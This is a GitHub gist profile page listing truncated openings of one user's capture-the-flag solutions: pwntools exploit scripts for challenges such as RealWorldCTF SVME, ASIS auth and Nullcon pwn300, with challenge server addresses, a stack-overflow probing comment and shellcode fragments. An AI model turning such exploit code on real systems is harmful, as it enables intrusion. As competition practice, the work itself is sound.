Manuel Blanco dialluvioso

30 followers · 10 following

Spain
@dialluvioso_

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

dialluvioso / svme.py

Created January 23, 2022 13:59

Solution to SVME from RealWorldCTF

	#!/usr/bin/env python3
	# -- coding: utf-8 --
	from pwn import *

	POP = 0x0f
	PRINT = 0x0e
	GSTORE = 0x0d
	ICONST = 9
	GLOAD = 0xb
	STORE = 0xc

dialluvioso / whomovedmyblock.py

Created January 23, 2022 13:57

Solution to Who Moved My Block from RealWorldCTF

	#!/usr/bin/env python3
	# -- coding: utf-8 --
	from pwn import *

	# remote stack-based buffer overflow in `handle_info`
	# since the architecture is a fork based model without execve()
	# naive strategy is a linear probing using the response as an oracle

	HOST = "47.242.113.232" #"localhost"
	PORT = 49240 #10809

dialluvioso / wizardcult.py

Created October 24, 2021 19:53

Solution for the last flareon2021 challenge

	#!/usr/bin/env python3
	# -- coding: utf-8 --
	import sys

	table = [90, 132, 6, 69, 174, 203, 232, 243, 87, 254, 166, 61, 94, 65, 8, 208, 51, 34, 33, 129, 32, 221, 0, 160, 35, 175, 113, 4, 139, 245, 24, 29, 225, 15, 101, 9, 206, 66, 120, 62, 195, 55, 202, 143, 100, 50, 224, 172, 222, 145, 124, 42, 192, 7, 244, 149, 159, 64, 83, 229, 103, 182, 122, 82, 78, 63, 131, 75, 201, 130, 114, 46, 118, 28, 241, 30, 204, 183, 215, 199, 138, 16, 121, 26, 77, 25, 53, 22, 125, 67, 43, 205, 134, 171, 68, 146, 212, 14, 152, 20, 185, 155, 167, 36, 27, 60, 226, 58, 211, 240, 253, 79, 119, 209, 163, 12, 72, 128, 106, 218, 189, 216, 71, 91, 250, 150, 11, 236, 207, 73, 217, 17, 127, 177, 39, 231, 197, 178, 99, 230, 40, 54, 179, 93, 251, 220, 168, 112, 37, 246, 176, 156, 165, 95, 184, 57, 228, 133, 169, 252, 19, 2, 81, 48, 242, 105, 255, 116, 191, 89, 181, 70, 23, 194, 88, 97, 153, 235, 164, 158, 137, 238, 108, 239, 162, 144, 115, 140, 84, 188, 109, 219, 44, 214, 227, 161, 141, 80, 247, 52, 213, 249, 1, 123, 142, 190, 104, 107, 85,

dialluvioso / ntbabyheap.py

Created June 17, 2021 10:29

NT Babyheap

	# -- coding: utf-8 --
	from pwintools import *

	filepath = "NtBabyHeap.exe"

	def add(size):
	io.recvuntil("Enter Choice:")
	io.sendline("1")
	io.recvuntil("Enter size:")
	io.sendline("%d" % size)

dialluvioso / bootsector.py

Created June 17, 2021 10:18

FAT32 dissector for SSTIC 2021 CTF

	#!/usr/bin/env python3
	# -- coding: utf-8 --
	import struct

	u8 = lambda x: struct.unpack("<B", x)[0]
	u16 = lambda x: struct.unpack("<H", x)[0]
	u32 = lambda x: struct.unpack("<I", x)[0]

	OFFSET_BYTSPERSEC = 11
	OFFSET_SECPERCLUS = 13

dialluvioso / sstic-maze-exploit.py

Created June 17, 2021 10:12

Exploit for the maze challenge SSTIC 2021 CTF

	#!/usr/bin/env python3
	# -- coding: utf-8 --
	from pwn import *

	local = False

	if local:
	HOST = "localhost"
	PORT = 1337
	else:

dialluvioso / auth.py

Created December 13, 2020 22:38

Exploit for auth challenge ASIS CTF 2020

	#!/usr/bin/env python3
	# -- coding: utf-8 --
	from pwn import *

	HOST = "69.90.132.134"
	PORT = 3317

	LOCAL = False

	#context.log_level = "debug"

dialluvioso / pokedex.py

Created October 6, 2018 10:46

	#!/usr/bin/env python
	from pwn import *

	local = False

	host = 'challenges.ka0labs.org'
	port = 1341

	elf = ELF('pokedex_nn2k18')
	libc = ELF('libc-2.27.so')

dialluvioso / babysandbox.py

Created July 16, 2018 13:04

	#!/usr/bin/env python
	from pwn import *
	from base64 import b64encode

	context.arch = 'i386'

	shellcode = asm('''
	push 0x66
	pop eax
	push ebx

dialluvioso / pwn300.py

Created February 11, 2018 14:45

Nullcon HackIM 2018 - Exploitation Question 2 (300 points)

	from pwn import *

	local = False

	binary = ELF('./pwn2-box.bin')
	context.arch = 'amd64'

	p = process('./pwn2-box.bin') if local else remote('35.170.14.27', 9002)

	# Custom shellcode using allowed seccomp sandbox syscalls to communicate with the child process